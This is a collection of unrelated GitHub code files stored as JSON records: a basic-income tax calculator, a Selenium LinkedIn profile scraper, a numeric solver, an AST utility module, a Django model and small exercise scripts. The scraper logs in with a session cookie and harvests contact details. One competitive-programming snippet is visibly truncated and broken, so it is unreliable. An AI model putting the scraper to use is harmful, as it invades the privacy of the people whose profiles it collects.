Please fill out this questionnaire:\")\n qr_code = \"\"\"\n ┌─────────────────────────────────────┐\n │ │\n │ ▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ │\n │ █ ▄▄▄ █ ▄ ▄▄█▄ ▀█ ▄ █ ▄▄▄ █ │\n │ █ ███ █ ██▄█ █ █▀▀▀█ █ ███ █ │\n │ █▄▄▄▄▄█ ▄▀▄ █▀▄ ▄▀█▀█ █▄▄▄▄▄█ │\n │ ▄▄▄▄ ▄ ▄▀ ▀ ▄▄▀▀███▀▄ ▄▄▄ ▄ │\n │ ▄▄█▄█▀▄▀▄▀ ▄▀ █ ▄▀█ ███ ▄▄▀ │\n │ █▄█▀▄▄▀ ▄ █▀██▄█▄▀▄▀▀▀▀▀▄▄ ▀ │\n │ █▀▄▀██▄ ▀▄█▀▄ █ █▀ ██▄▀█▄ ███ │\n │ █▀▄██ ▄ ▀ ▄▄▀ ▀▀▀ ▄ █▄▀▀█▄ █ │\n │ ▄▀▀▄▀ ▄▀██▄▄█ ▀█▄ ▀ ▀▀ █ ▀█▀ │\n │ ▄▀█▀▀▄▄▄▄▄▄█ █▄▀█▄███▄▄▄▄█ │\n │ ▄▄▄▄▄▄▄ ▀██▄█▄▄ ▀▄█ ▄ ██▀█▀ │\n │ █ ▄▄▄ █ ▀▄ ▄▀██▄▄▀ █▄▄▄█▀▄█▄ │\n │ █ ███ █ █ ▄█▀▄ ▀▀ ▀▀█ ▄▀▀▄ █ │\n │ █▄▄▄▄▄█ █ ▀ █▄█ ▀██ ▀ █ █ │\n │ │\n └─────────────────────────────────────┘\n \"\"\"\n print(\"\\r\\n\".join(f\"\\u001b[30m\\u001b[47m{l.strip()}\\u001b[0m\" for l in qr_code.splitlines()))\n","repo_name":"hassanselim0/django-state-machine-demo","sub_path":"django_state_machine_demo/orders/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43107598213","text":"## Author: Jessica Chew\n## Version: 0.0.0.0\n## Date: 10 April 2023\n##############################################\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport streamlit as st\n##############################################\n\nst.set_page_config(layout=\"wide\")\n\n## UBI section ## experimental\nst.header(\"Easily estimate how you could benefit from a Universal Basic Income\")\nst.subheader(\"BASIC INCOME AUSTRALIA - EXPERIMENTAL POLICY MODELLING TOOL\")\nst.write(\"BIA proposes a AUD 500/week (26,000/year) universal basic income paid to every adult 18+ years in Australia without conditions or targeting (details TBC)\")\nst.write(\"The BIA policy recovers the UBI payment at 32.26 percent of an individual's gross salary up to 80,600. The 32.26 percent clawback rate was chosen as it represents the dollar amount of annual UBI paid to an individual out of the 80,600 per year threshold. (32.26% = 26,000/80,600)\")\nst.write(\"This means an 80,600 per annum salary is the threshold at which an individual ceases to be a net beneficiary.\")\nst.write(\"If you earn more than 80,600 a year, it means you will still receive the regular UBI payment like everyone else however the full UBI payment ($26K) will be recovered through the group tax system.\")\nst.write(\"If you earn less than 80,600 a year, you become a net UBI beneficiary on a sliding scale. This means, the more you earn, the lower the proportion of the $500/week UBI you will receive. The less you earn, the more of the UBI payment you get to keep.\")\nst.write(\"See what UBI means for you by entering your annual salary.\")\n\n\n# Income input\npi = st.number_input (\"What is your annual personal income?\" , value = 20000) ## Default to $20K for now. 
Future idea: show nothing until the user inputs a salary\n\n# Calculate barebones personal income tax for FY 2022-2023\n# https://www.ato.gov.au/Rates/Individual-income-tax-rates/\ndef tax_payable(pi):\n if ((pi > 0) and (pi <= 18200)):\n tax = 0\n elif ((pi >= 18201) and (pi <= 45000)):\n tax = (pi - 18200) * 0.19\n elif ((pi >= 45001) and (pi <= 120000)):\n tax = ((pi - 45000) * 0.325) + 5092\n elif ((pi >= 120001) and (pi <= 180000)):\n tax = ((pi - 120000) * 0.37) + 29467\n elif pi >= 180001:\n tax = ((pi - 180000) * 0.45) + 51667\n return(tax)\n\n#tax_payable(60000)\n\n\n## Set up the outputs at different time levels\n\n## Basic income payment\nweekly_ubi_level = 500\nannual_ubi = weekly_ubi_level*52\nweekly_ubi = weekly_ubi_level\nfornightly_ubi = weekly_ubi_level*2\n\n##Basic income clawback level\nclawback_amount = 26000\n\n## Tax payable\nannual_tax_payable = round(tax_payable(pi),0)\nweekly_tax_payable = round((tax_payable(pi))/52,0)\nfortnightly_tax_payable = round((tax_payable(pi))/26,0)\n\n## Gross earned income\nannual_gross_income = round(pi,0)\nweekly_gross_income = round((pi/52),0)\nfortnightly_gross_income = round((pi/26),0)\n\n## Net earned income\nannual_net_income = round(pi-(tax_payable(pi)),0)\nweekly_net_income = round((pi-(tax_payable(pi)))/52,0)\nfortnightly_net_income = round((pi-(tax_payable(pi)))/26,0)\n\n## UBI recovery \"clawback\" function\ndef clawback(annual_gross_income):\n if (annual_gross_income > 80600):\n clawback = clawback_amount\n elif (annual_gross_income <= 80600):\n clawback = round(annual_gross_income * 0.3226 ,0)\n return(clawback)\n\nnet_ubi_benefit = clawback_amount - clawback(annual_gross_income) \n\ndef ubi_recovery_explainer(annual_gross_income):\n if (annual_gross_income > 80600):\n explainer = \"(Because your salary exceeds the annual threshold the whole basic income is recaptured)\"\n elif (annual_gross_income <= 80600):\n explainer = \"($\" + str(round(annual_gross_income,0)) + \" x 32.26%)\"\n return(explainer)\n\nnet_benefit = annual_net_income + net_ubi_benefit\n\ndef net_benefit_explainer(annual_gross_income):\n if (annual_gross_income > 80600):\n explainer = \"Because your salary exceeds the annual threshold you do not receive a net UBI benefit but neither are you worse off (your annual net take home pay in both scenarios is the same) \" ## not to mention potential interest rate gains from being paid a UBI in advance?!?!?\n elif (annual_gross_income <= 80600):\n explainer = \"You are \" + str(net_benefit - annual_net_income) + \" dollars ahead compared to not receiving a 500 dollar/week UBI\" + \" (\" + str(round(net_benefit,0)) + \"-\" + str(round(annual_net_income,0)) +\")\"\n return(explainer)\n\n\n\n\n\n## Set up the two columns\ncol1, col2 = st.columns(2)\n\nwith col1:\n st.subheader('Current personal income taxation regime (no UBI)')\n st.write(\"Annual gross income:\" , pi )\n st.write(\"Annual tax payable:\" , annual_tax_payable , \"or\" , round((annual_tax_payable/pi)*100,0) , \"percent of your income\")\n st.write(\"Annual net take home pay:\" , annual_net_income)\n st.markdown(\"\"\" Tax calculations are based on the ATO 2022-2023 personal income tax schedule: https://www.ato.gov.au/rates/individual-income-tax-rates/\"\"\", unsafe_allow_html=True)\n st.markdown(\"\"\" Note: This calculator does not cover any HECS-HELP repayments, Medicare levy, Medicare levy surcharge, working holiday makers' tax obligations nor the First Home Super Saver (FHSS) scheme. 
It simply models the latest Australian personal income tax structure assuming you were a full-year resident for tax purposes.\"\"\", unsafe_allow_html=True)\n \nwith col2:\n st.subheader(\"BIA's Proposed UBI mechanism\")\n st.write(\"Annual gross income:\" , pi )\n st.write(\"Annual tax payable:\" , annual_tax_payable , \"or\" , round((annual_tax_payable/pi)*100,0) , \"percent of your income\")\n st.write(\"UBI recovery amount:\" , clawback(annual_gross_income) , ubi_recovery_explainer(annual_gross_income)) \n st.write(\"Net UBI\" , net_ubi_benefit , \"(\" , \"$26000 -\" , clawback(annual_gross_income) ,\")\")\n st.write(\"Annual net take home pay + net UBI\" , net_benefit, \"(\" , annual_net_income , \"+\" , net_ubi_benefit, \")\")\n netbenexp = net_benefit_explainer(annual_gross_income)\n style = \"{}\".format(netbenexp)\n st.markdown(style, unsafe_allow_html=True)\n st.markdown(\"\"\" Calculator prepared by Jessica Chew | [jessicacychew.com](https://jessicacychew.com) | [GitHub](https://github.com/jessicacychew/bia_policy_model)\"\"\", unsafe_allow_html=True)\n\n \n\n## next steps (from 9 April 2023 onwards)\n## Finesse the blurb\n## Finesse the code labels to accord with the accounting language\n## Make sure there are no errors when the page first loads (and there's no income input yet)\n## Figure out versioning structure - official\n## Add link to Git\n## Publish\n## Share with Michael alongside list of next steps and ideas\n## e.g., model line graph, do different scenarios with HECs, people receiving DSP etc and also different time drop downs, add language about two-part tax, add colour\n## feedback form\n## drop down for code like UBI center\n\n\n","repo_name":"jessicacychew/bia_policy_model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43606049832","text":"import logging\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nLINKED_IN_URL = 'https://www.linkedin.com/'\nSKILLS_SHOW_MORE_BUTTON_XPATH = '.pv-profile-section__card-action-bar.pv-skills-section__additional-skills.artdeco-container-card-action-bar.artdeco-button.artdeco-button--tertiary.artdeco-button--3.artdeco-button--fluid'\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass LinkedInScraper:\n def __init__(self, _cookie):\n self.driver_options = webdriver.ChromeOptions()\n self.driver = None\n\n self.cookie = _cookie\n\n def init_driver(self):\n logging.info('Initializing the web driver')\n\n self.driver_options.add_argument('--log-level=3')\n self.driver_options.add_argument('--disable-logging')\n # self.driver_options.add_argument('--headless')\n\n # self.driver_options.add_experimental_option('prefs', {\n # 'profile.managed_default_content_settings.images': 2\n # })\n\n try:\n self.driver = webdriver.Chrome(chrome_options=self.driver_options)\n except:\n logging.error('Couldn\\'t Initialize the web driver')\n\n def set_login_cookie(self):\n self.driver.add_cookie({'name': 'li_at', 'value': self.cookie})\n\n def login(self):\n self.driver.get(LINKED_IN_URL)\n self.set_login_cookie()\n self.driver.get(LINKED_IN_URL)\n\n input_field = self.driver.find_elements_by_class_name('input__field')\n\n if len(input_field) > 0:\n logging.error('Invalid cookie')\n\n self.driver.close()\n\n def text_or_none(self, element):\n if 
element:\n return element.text\n\n return \"\"\n\n def wait_for(self, css_selector):\n try:\n return WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, css_selector))\n )\n except:\n return None\n\n def get_element(self, css_selector, parent=None):\n elements = []\n\n if parent:\n elements = parent.find_elements_by_css_selector(css_selector)\n else:\n elements = self.driver.find_elements_by_css_selector(css_selector)\n\n if len(elements) > 0:\n return elements[0]\n\n return None\n\n def get_user_data(self):\n user_profile = {}\n\n user_profile['fullname'] = self.text_or_none(\n self.driver.find_element_by_css_selector('.pv-top-card--list > li'))\n user_profile['title'] = self.text_or_none(self.driver.find_element_by_css_selector('.ph5.pb5 .mt1'))\n user_profile['photo'] = self.driver.find_element_by_css_selector(\n '.profile-photo-edit__preview.ember-view').get_attribute('src')\n\n about_show_more = self.driver.find_element_by_css_selector('#line-clamp-show-more-button')\n\n if about_show_more:\n self.driver.execute_script(\n 'arguments[0].click()', about_show_more)\n\n user_profile['about'] = self.text_or_none(\n self.driver.find_element_by_css_selector('.pv-about__summary-text.mt4.t-14.ember-view'))\n\n self.driver.find_element_by_css_selector(\"a[data-control-name='contact_see_more']\").click()\n\n linkedin_url_element = self.wait_for('.ci-vanity-url a')\n linkedin_url = linkedin_url_element.get_attribute('href')\n\n user_profile['linkedin_username'] = linkedin_url.split('/')[-1]\n user_profile['linkedin_link'] = linkedin_url\n\n email_element = self.get_element('.ci-email a')\n user_profile['email'] = self.text_or_none(email_element)\n\n location_element = self.get_element('.ci-address a')\n user_profile['location'] = self.text_or_none(location_element)\n\n websites_element = self.get_element('.ci-websites')\n user_profile['websites'] = {}\n\n for website in websites_element.find_elements_by_css_selector('li'):\n website_link = website.find_element_by_css_selector('a').get_attribute('href')\n website_type = self.text_or_none(website.find_element_by_css_selector('span')) \\\n .strip().replace('(', '').replace(')', '').lower()\n\n user_profile['websites'][website_type] = website_link\n\n numbers_element = self.get_element('.ci-phone')\n user_profile['numbers'] = {}\n\n for phone in numbers_element.find_elements_by_css_selector('li'):\n phone_number = self.text_or_none(phone.find_elements_by_css_selector('span')[0])\n phone_type = self.text_or_none(phone.find_elements_by_css_selector('span')[1]) \\\n .strip().replace('(', '').replace(')', '').lower()\n\n user_profile['numbers'][phone_type] = phone_number\n\n self.driver.find_element_by_css_selector(\"button.artdeco-modal__dismiss\").click()\n\n return user_profile\n\n def get_skills(self):\n skills = []\n\n skills_show_more_button = self.driver.find_elements_by_css_selector(\n SKILLS_SHOW_MORE_BUTTON_XPATH)\n\n while len(skills_show_more_button) <= 0:\n skills_show_more_button = self.driver.find_elements_by_css_selector(\n SKILLS_SHOW_MORE_BUTTON_XPATH)\n\n self.driver.execute_script(\n 'arguments[0].click()', skills_show_more_button[0])\n\n top_skills_list = self.driver.find_elements_by_css_selector(\n '.pv-skill-category-entity__top-skill .pv-skill-category-entity__name')\n\n skills.append({\n \"type\": \"Top Skills\",\n \"skills\": [\n el.text for el in\n top_skills_list]\n })\n\n skills_list = self.driver.find_elements_by_css_selector(\n 
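# brittle: LinkedIn rotates these generated class names, so this selector may need updating\n            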
'.pv-skill-category-list.pv-profile-section__section-info')\n\n for skills_category in skills_list:\n skill_title = skills_category.find_element_by_css_selector(\n '.pv-skill-categories-section__secondary-skill-heading').text\n\n skills.append({\n \"type\": skill_title,\n \"skills\": [\n el.text for el in\n skills_category.find_elements_by_class_name('pv-skill-category-entity__name-text')]\n })\n\n return skills\n\n def get_educations(self):\n educations = []\n\n educations_list = self.driver.find_elements_by_css_selector(\n '#education-section ul > .ember-view')\n\n for education in educations_list:\n school_name_el = education.find_elements_by_class_name(\n 'pv-entity__school-name')\n degree_name_el = education.find_elements_by_class_name(\n 'pv-entity__degree-name')\n field_of_study_el = education.find_elements_by_class_name(\n 'pv-entity__fos')\n dates_el = education.find_elements_by_css_selector(\n '.pv-entity__dates')\n\n school_name = \"\"\n degree_name = \"\"\n field_of_study = \"\"\n start_date = \"\"\n end_date = \"\"\n\n if len(school_name_el) > 0:\n school_name = school_name_el[0].text\n\n if len(degree_name_el) > 0:\n degree_name = degree_name_el[0].find_element_by_class_name(\n 'pv-entity__comma-item').text\n\n if len(field_of_study_el) > 0:\n field_of_study = field_of_study_el[0].find_element_by_class_name(\n 'pv-entity__comma-item').text\n\n if len(dates_el) > 0:\n dates = dates_el[0].find_elements_by_css_selector('time')\n\n start_date = dates[0].text if len(dates) > 0 else \"\"\n end_date = dates[1].text if len(dates) > 1 else \"\"\n\n educations.append({\n \"schoolName\": school_name,\n \"degreeName\": degree_name,\n \"fieldOfStudy\": field_of_study,\n \"startDate\": start_date,\n \"endDate\": end_date\n })\n\n return educations\n\n def get_experiences(self):\n experiences = []\n\n experience_list = self.driver.find_elements_by_css_selector(\n '#experience-section ul > .ember-view')\n\n for experience in experience_list:\n title_el = experience.find_elements_by_css_selector('h3')\n company_el = experience.find_elements_by_css_selector(\n '.pv-entity__secondary-title')\n description_el = experience.find_elements_by_css_selector(\n '.pv-entity__description')\n location_el = experience.find_elements_by_css_selector(\n '.pv-entity__location span:nth-child(2)')\n date_range_el = experience.find_elements_by_css_selector(\n '.pv-entity__date-range span:nth-child(2)')\n\n title = \"\"\n company = \"\"\n description = \"\"\n location = \"\"\n start_date = \"\"\n end_date = \"\"\n\n if len(title_el) > 0:\n title = title_el[0].text\n\n if len(company_el) > 0:\n company = company_el[0].text\n\n if len(description_el) > 0:\n description = description_el[0].text\n\n if len(location_el) > 0:\n location = location_el[0].text\n\n if len(date_range_el) > 0:\n dates = date_range_el[0].text.split('–')\n\n start_date = dates[0] if len(dates) > 0 else \"\"\n end_date = dates[1] if len(dates) > 1 else \"\"\n\n experiences.append({\n \"title\": title,\n \"company\": company,\n \"description\": description,\n \"location\": location,\n \"start_date\": start_date,\n \"end_date\": end_date\n })\n\n return experiences\n\n def get_projects(self):\n projects = []\n\n expand_button = self.wait_for('button[aria-controls=\"projects-expandable-content\"]')\n\n if not expand_button:\n return []\n\n self.driver.execute_script('arguments[0].click()', expand_button)\n\n show_more_button = self.get_element(\n '#projects-expandable-content .pv-profile-section__see-more-inline')\n\n if show_more_button:\n 
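# a JavaScript click sidesteps Selenium's visibility checks on this lazily rendered button\n            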
self.driver.execute_script('arguments[0].click()', show_more_button)\n\n        projects_list = self.driver.find_elements_by_css_selector(\n            '#projects-expandable-content ul > .ember-view')\n\n        for project in projects_list:\n            title = \"\"\n            description = \"\"\n            external_link = \"\"\n            start_date = \"\"\n            end_date = \"\"\n\n            title_el = self.get_element('.pv-accomplishment-entity__title', project)\n\n            if title_el:\n                self.driver.execute_script('arguments[0].remove()', title_el.find_element_by_css_selector('span'))\n                title = self.text_or_none(title_el)\n\n            description_el = self.get_element('.pv-accomplishment-entity__description', project)\n\n            if description_el:\n                self.driver.execute_script('arguments[0].remove()', description_el.find_element_by_css_selector('div'))\n                description = self.text_or_none(description_el)\n\n            external_link_el = self.get_element('.pv-accomplishment-entity__external-source', project)\n\n            if external_link_el:\n                external_link = external_link_el.get_attribute('href')\n\n            date_range_el = self.get_element('.pv-accomplishment-entity__date', project)\n\n            if date_range_el:\n                dates = self.text_or_none(date_range_el).split('–')\n\n                start_date = dates[0] if len(dates) > 0 else \"\"\n                end_date = dates[1] if len(dates) > 1 else \"\"\n\n            projects.append({\n                \"title\": title,\n                \"description\": list(map(lambda x: {\"bullet\": x}, description.split('\\n'))),\n                \"external_link\": external_link,\n                \"start_date\": start_date.strip(),\n                \"end_date\": end_date.strip()\n            })\n\n        return projects\n\n    def parse_profile(self, profile_url):\n        user_data = {}\n\n        logging.info(f'Parsing {profile_url}')\n\n        self.driver.get(profile_url)\n\n        user_data['user_profile'] = self.get_user_data()\n\n        self.driver.execute_script(\n            \"window.scrollTo(0, document.body.scrollHeight);\")\n\n        see_more_buttons = self.driver.find_elements_by_css_selector(\n            'button.pv-profile-section__see-more-inline.pv-profile-section__text-truncate-toggle.link')\n\n        for see_more_button in see_more_buttons:\n            self.driver.execute_script('arguments[0].click()', see_more_button)\n\n        user_data[\"educations\"] = self.get_educations()\n        user_data[\"skills\"] = self.get_skills()\n        user_data[\"experiences\"] = self.get_experiences()\n        user_data[\"projects\"] = self.get_projects()\n\n        return user_data\n","repo_name":"oussama1598/linkedin_resume","sub_path":"app/modules/linked_in_scraper.py","file_name":"linked_in_scraper.py","file_ext":"py","file_size_in_byte":13003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"70212713445","text":"from decimal import *\r\n\r\n\r\ndef main():\r\n    global A, B, C, PI\r\n    getcontext().prec = 60\r\n    getcontext().rounding = ROUND_HALF_UP\r\n    A, B, C = map(Decimal, input().split())\r\n    PI = Decimal('3.14159265358979323846264338327950288419716939937510')\r\n    print(round(find_sol(), 6))\r\n\r\n\r\ndef sin(x: Decimal) -> Decimal:\r\n    x = x % (2 * PI)\r\n    i, lasts, s, fact, num, sign = 1, 0, x, 1, x, 1\r\n    while s != lasts:\r\n        lasts = s\r\n        i += 2\r\n        fact *= i * (i - 1)\r\n        num *= x * x\r\n        sign *= -1\r\n        s += num / fact * sign\r\n    return +s\r\n\r\n\r\ndef f(t: Decimal) -> Decimal:\r\n    return A * t + B * sin(t)\r\n\r\n\r\ndef find_sol():\r\n    upper = Decimal('2000000')\r\n    lower = Decimal('0')\r\n\r\n    while abs(upper - lower) > Decimal(10**-25):\r\n        mid = (upper + lower) / 2\r\n        if f(mid) < C:\r\n            lower = mid\r\n        else:\r\n            upper = mid\r\n\r\n    return upper\r\n\r\n\r\nif __name__ == '__main__':\r\n    
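# Taylor-series sin() on Decimal: float math cannot reach the 1e-25 tolerance used in find_sol()\r\n    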
main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Diamond/13705. Ax+Bsin(x)=C/Ax+Bsin(x)=C.py","file_name":"Ax+Bsin(x)=C.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42203508040","text":"import sys\n# input = sys.stdin.buffer.readline\ndef I(): return(list(map(int,input().split())))\ndef sieve(n):\n\ta=[1]*n\n\tfor i in range(2,n):\n\t if a[i]:\n\t for j in range(i*i,n,i):\n\t a[j]=0\n\treturn a\n\nfor __ in range(int(input())):\n\tarr=input()\n\tn=len(arr)\n\tposs=[]\n\ti=0\n\twhile(in-1:break\n\t\tnex=arr[i]\n\t\tif prev!=nex:\n\t\t\tans=min(ans,c+2)\n\tprint(ans) if ans tp.Any:\n \"\"\"\n execs a definition in a file and returns the definiton\n\n For explanation of serialized_tree see\n https://github.com/leonardt/ast_tools/issues/46\n \"\"\"\n tree_name = _get_name(tree)\n if file_name is None:\n file_name = f'{tree_name}_{datetime.datetime.now().isoformat()}.py'\n\n return exec_in_file(tree, st, path, file_name, serialized_tree)[tree_name]\n\ndef _get_name(tree: DefStmt) -> str:\n if isinstance(tree, ast.AST):\n return tree.name\n else:\n return tree.name.value\n\ndef to_source(\n tree: DefStmt\n ) -> str:\n if isinstance(tree, ast.AST):\n return astor.to_source(tree)\n else:\n return to_module(tree).code\n\ndef exec_in_file(\n tree: DefStmt,\n st: SymbolTable,\n path: tp.Optional[str] = None,\n file_name: tp.Optional[str] = None,\n serialized_tree: tp.Optional[DefStmt] = None,\n ) -> tp.MutableMapping[str, tp.Any]:\n\n \"\"\"\n execs an ast as a module and returns the modified enviroment\n\n For explanation of serialized_tree see\n https://github.com/leonardt/ast_tools/issues/46\n \"\"\"\n\n source = to_source(tree)\n if serialized_tree is None:\n serialized_source = source\n else:\n serialized_source = to_source(serialized_tree)\n return exec_str_in_file(source, st, path, file_name, serialized_source)\n\n\ndef exec_str_in_file(\n source: str,\n st: SymbolTable,\n path: tp.Optional[str] = None,\n file_name: tp.Optional[str] = None,\n serialized_source: tp.Optional[str] = None,\n ) -> tp.MutableMapping[str, tp.Any]:\n \"\"\"\n execs a string as a module and returns the modified enviroment\n\n For explanation of serialized_source see\n https://github.com/leonardt/ast_tools/issues/46\n \"\"\"\n\n if path is None:\n path = '.ast_tools'\n\n if file_name is None:\n file_name = f'ast_tools_exec_{datetime.datetime.now().isoformat()}.py'\n\n if serialized_source is None:\n serialized_source = source\n\n file_name = os.path.join(path, file_name)\n os.makedirs(path, exist_ok=True)\n with open(file_name, 'w') as fp:\n fp.write(serialized_source)\n\n try:\n code = compile(source, filename=file_name, mode='exec')\n except Exception as e:\n logging.exception(\"Error compiling source\")\n raise e from None\n\n st_dict = dict(st)\n try:\n exec(code, st_dict)\n return st_dict\n except Exception as e:\n logging.exception(\"Error executing code\")\n raise e from None\n\n\n_AST_CACHE: tp.MutableMapping[tp.Any, ast.AST] = weakref.WeakKeyDictionary()\ndef get_ast(obj) -> ast.AST:\n \"\"\"\n Given an object, get the corresponding AST\n \"\"\"\n try:\n return _AST_CACHE[obj]\n except KeyError:\n pass\n\n src = textwrap.dedent(inspect.getsource(obj))\n\n if isinstance(obj, types.ModuleType):\n tree = ast.parse(src)\n else:\n tree = ast.parse(src).body[0]\n\n return _AST_CACHE.setdefault(obj, tree)\n\n\n\n_CST_CACHE: tp.MutableMapping[tp.Any, cst.CSTNode] = weakref.WeakKeyDictionary()\ndef 
get_cst(obj) -> cst.CSTNode:\n \"\"\"\n Given an object, get the corresponding CST\n \"\"\"\n try:\n return _CST_CACHE[obj]\n except KeyError:\n pass\n\n src = textwrap.dedent(inspect.getsource(obj))\n\n if isinstance(obj, types.ModuleType):\n tree = cst.parse_module(src)\n else:\n tree = cst.parse_statement(src)\n\n return _CST_CACHE.setdefault(obj, tree)\n\n\ndef is_free_name(tree: cst.CSTNode, env: SymbolTable, name: str):\n names = used_names(tree)\n return name not in names and name not in env\n\n\ndef is_free_prefix(tree: cst.CSTNode, env: SymbolTable, prefix: str):\n names = used_names(tree)\n return not any(\n name.startswith(prefix)\n for name in itertools.chain(names, env.keys()))\n\n\ndef gen_free_name(\n tree: cst.CSTNode,\n env: SymbolTable,\n prefix: tp.Optional[str] = None) -> str:\n names = used_names(tree) | env.keys()\n if prefix is not None and prefix not in names:\n return prefix\n elif prefix is None:\n prefix = '_auto_name_'\n\n f_str = prefix+'{}'\n c = 0\n name = f_str.format(c)\n while name in names:\n c += 1\n name = f_str.format(c)\n\n return name\n\n\ndef gen_free_prefix(\n tree: cst.CSTNode,\n env: SymbolTable,\n preprefix: tp.Optional[str] = None) -> str:\n def check_prefix(prefix: str, used_names: tp.AbstractSet[str]) -> bool:\n return not any(name.startswith(prefix) for name in used_names)\n\n names = used_names(tree) | env.keys()\n\n if preprefix is not None and check_prefix(preprefix, names):\n return preprefix\n elif preprefix is None:\n preprefix = '_auto_prefix_'\n\n f_str = preprefix+'{}'\n c = 0\n prefix = f_str.format(c)\n while not check_prefix(prefix, names):\n c += 1\n prefix = f_str.format(c)\n\n return prefix\n","repo_name":"leonardt/ast_tools","sub_path":"ast_tools/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"41300060777","text":"from django.db import models\nfrom django.db.models.signals import post_save\nfrom simple_history.models import HistoricalRecords\nfrom patolsima_api.utils.models import AuditableMixin, ArchivableMixing\nfrom patolsima_api.apps.core.models.estudio import Estudio\n\n\nclass Muestra(AuditableMixin, ArchivableMixing):\n class Estados(models.TextChoices):\n RECIBIDA = \"RECIBIDA\"\n DESCRIPCION_MACROSCOPICA = \"DESCRIPCION_MACROSCOPICA\"\n DESHIDRATACION = \"DESHIDRATACION\"\n INCLUSION_EN_PARAFINA = \"INCLUSION_EN_PARAFINA\"\n CORTE_MICROTOMO = \"CORTE_MICROTOMO\"\n COLORACION = \"COLORACION\"\n COLORACIONES_ESPECIALES = \"COLORACIONES_ESPECIALES\"\n DIAGNOSTICO_MICROSCOPICO = \"DIAGNOSTICO_MICROSCOPICO\"\n ALMACENAMIENTO = \"ALMACENAMIENTO\"\n DISPOSICION_DE_RESIDUOS = \"DISPOSICION_DE_RESIDUOS\"\n PERDIDA = \"PERDIDA\"\n\n estudio = models.ForeignKey(\n Estudio, on_delete=models.CASCADE, related_name=\"muestras\"\n )\n tipo_de_muestra = models.CharField(max_length=255)\n descripcion = models.CharField(max_length=512, null=True, blank=True)\n notas = models.TextField(null=True, blank=True)\n estado = models.CharField(\n max_length=32, choices=Estados.choices, default=Estados.RECIBIDA, db_index=True\n )\n\n history = HistoricalRecords()\n\n @classmethod\n def post_create(cls, sender, instance, created, *args, **kwargs):\n if not created:\n return\n\n instance.fases.create(muestra=instance, notas=\"\")\n\n\npost_save.connect(Muestra.post_create, 
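# the second positional argument is the sender, so only Muestra saves dispatch post_create\n                   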
Muestra)\n","repo_name":"jiro141/patolsima-free-api","sub_path":"patolsima_api/apps/core/models/muestra.py","file_name":"muestra.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"72930037926","text":"import requests, re\n\n# Parse out the text block\nlink = 'http://www.pythonchallenge.com/pc/def/ocr.html'\nbody = requests.get(link)\n\npattern = re.compile('<!--[\\\s\\\S]*-->')\nmatch = pattern.search(body.text)\n\ndata = match.group()\ndata = re.sub('<!--|-->','',data)\n\nfrequency = {}\nfor letter in data:\n    if letter in frequency:\n        frequency[letter] = frequency[letter] + 1\n    else:\n        frequency[letter] = 1\n\nrare = \"\"\nfor key in frequency:\n    if frequency[key] == 1:\n        rare += key\n\nprint(rare)","repo_name":"oestej/python_challenge","sub_path":"02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"28284729901","text":"def get_float_from_user(msg):\r\n    while True:\r\n        try:\r\n            user_in=float(input(msg))\r\n\r\n        except ValueError:\r\n            print(\"You did not enter a number!\" )\r\n        except KeyboardInterrupt:\r\n            print(\"\\n***Oops, something went wrong! Try again!\\n\")\r\n            return None\r\n        else:\r\n            # print(user_in)\r\n            return user_in\r\n\r\ndef user_data():\r\n    user_number = get_float_from_user(\"***Enter a number, please! \")\r\n    user_height = get_float_from_user(\"I need to know your height in centimetres: \")\r\n    user_weight = get_float_from_user(\"And your weight in kilograms: \") \r\n    \r\n    try:\r\n        print(\"Your height is: {:5.2f}cm. and you weigh {:.2f}kg.\".format(user_height, user_weight)) \r\n    except:\r\n        print(\"\\n***Oops, something went wrong! Try again!\\n\")\r\n\r\nuser_data()","repo_name":"NLazarova15/MyCode","sub_path":"get_float_from_user.py","file_name":"get_float_from_user.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"16762176854","text":"\nimport numpy as np\ncount=0\nlist1=[i for i in range(1,10)]\nmatrix2=[]\nmatrix=[\n    [ 1, 2, 3 ],\n    [ 4, 5, 6 ],\n    [ 7, 8, 9 ]\n]\nmatrix2=np.array(list1).reshape(3,3)\nprint(matrix2)\nfor i in range(len(matrix[0])):\n    count+=1\nm,n=len(matrix)-1,count-1\nlast_row=m\nlast_col=n\nlist2=[]\nk=0\nl=0\nmatrix4=[]\nwhile (k<=last_row and l<=last_col):\n    for i in range(last_col+1):\n        list2.append(matrix[k][i])\n    k+=1\n    for i in range(k,last_row+1):\n        list2.append(matrix[i][last_col])\n    last_col-=1\n    for i in range(last_col,l-1,-1):\n        list2.append(matrix[last_row][i])\n    last_row-=1\n    for i in range(last_row,k-1,-1):\n        list2.append(matrix[i][l])\n    l+=1\nprint(list2)\nmatrix4=np.array(list2).reshape(3,3)\nprint(matrix4)","repo_name":"jagdishwar/CP","sub_path":"spiralmatric2.py","file_name":"spiralmatric2.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
